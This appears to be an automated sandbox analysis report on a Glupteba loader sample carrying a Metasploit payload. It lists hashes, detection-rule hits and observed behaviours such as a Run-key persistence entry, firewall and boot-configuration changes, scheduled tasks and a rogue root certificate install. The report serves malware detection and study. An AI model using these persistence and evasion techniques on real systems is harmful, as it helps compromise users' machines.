glupteba | e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424

General

Target

e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Size

3.9MB
MD5

3fe78f7695077a15ff90b11c0793c21f
SHA1

2fcbb4d51326ca0eafafad8ce757f6855f34ec55
SHA256

e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424
SHA512

1f5a3e19576db656ceea0468989d308831fa384ac13434d15642787806f7d838cbe95072dbd8c3e73947d320e5f98e40f920a6f496ce297287d60bb865f2c141
SSDEEP

98304:/aYFMnyHD6WfIo6j5+xufrLgJ5PI8yJRX7r4fhNdP:3FOyHJm2SLglyJRr0J

Score

10^/10

glupteba metasploit backdoor discovery dropper evasion loader persistence trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 8 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2864-133-0x00000000012E0000-0x0000000001AE5000-memory.dmp	family_glupteba
behavioral2/memory/2864-134-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/2864-136-0x00000000012E0000-0x0000000001AE5000-memory.dmp	family_glupteba
behavioral2/memory/2864-138-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/2764-139-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/2764-145-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/2704-147-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba
behavioral2/memory/2704-153-0x0000000000400000-0x0000000000C1F000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 852 created 2864	852	svchost.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
PID 852 created 2704	852	svchost.exe	csrss.exe
PID 852 created 2704	852	svchost.exe	csrss.exe
PID 852 created 2704	852	svchost.exe	csrss.exe

Executes dropped EXE 2 IoCs

Processes:

csrss.exepatch.exe

pid process

2704 csrss.exe
4992 patch.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

4300 netsh.exe

pid	process
2704	csrss.exe
4992	patch.exe

pid	process
4300	netsh.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DampGrass = "\"C:\\Windows\\rss\\csrss.exe\""	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

4852 bcdedit.exe

pid	process
4852	bcdedit.exe

Drops file in System32 directory 6 IoCs

Processes:

csrss.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	csrss.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A	csrss.exe

Drops file in Windows directory 2 IoCs

Processes:

e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe

description	ioc	process
File opened for modification	C:\Windows\rss	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
File created	C:\Windows\rss\csrss.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4748	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
2300	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
3400	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
4376	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
3188	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
3324	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
3460	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
3724	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
4012	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
2652	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
1224	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
2148	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
1068	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
884	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
3024	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
3028	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
4224	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
5104	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
3404	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
2244	2864	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
2788	2764	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
4208	2764	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
3224	2764	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
4172	2764	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
2924	2764	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
4968	2764	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
4628	2764	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
2768	2764	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
4952	2764	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
3860	2764	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
4384	2764	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
2420	2764	WerFault.exe	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
3124	2704	WerFault.exe	csrss.exe
1736	2704	WerFault.exe	csrss.exe
3672	2704	WerFault.exe	csrss.exe
3168	2704	WerFault.exe	csrss.exe
4544	2704	WerFault.exe	csrss.exe
1596	2704	WerFault.exe	csrss.exe
3912	2704	WerFault.exe	csrss.exe
4188	2704	WerFault.exe	csrss.exe
4748	2704	WerFault.exe	csrss.exe
2740	2704	WerFault.exe	csrss.exe
1608	2704	WerFault.exe	csrss.exe
1508	2704	WerFault.exe	csrss.exe
3252	2704	WerFault.exe	csrss.exe
4076	2704	WerFault.exe	csrss.exe
1068	2704	WerFault.exe	csrss.exe
1732	2704	WerFault.exe	csrss.exe
3192	2704	WerFault.exe	csrss.exe
3140	2704	WerFault.exe	csrss.exe
1296	2704	WerFault.exe	csrss.exe
4172	2704	WerFault.exe	csrss.exe
3020	2704	WerFault.exe	csrss.exe
3412	2704	WerFault.exe	csrss.exe
1980	2704	WerFault.exe	csrss.exe
2304	2704	WerFault.exe	csrss.exe
420	2704	WerFault.exe	csrss.exe
1984	2704	WerFault.exe	csrss.exe
2400	2704	WerFault.exe	csrss.exe
3036	2704	WerFault.exe	csrss.exe
4752	2704	WerFault.exe	csrss.exe
3980	2704	WerFault.exe	csrss.exe
4188	2704	WerFault.exe	csrss.exe
3636	2704	WerFault.exe	csrss.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2596 schtasks.exe
3972 schtasks.exe

pid	process
2596	schtasks.exe
3972	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.execsrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	e277e9f15664d74ff041442d63529322bcf143ad87d36ab2aed1b84984054424.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

csrss.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfc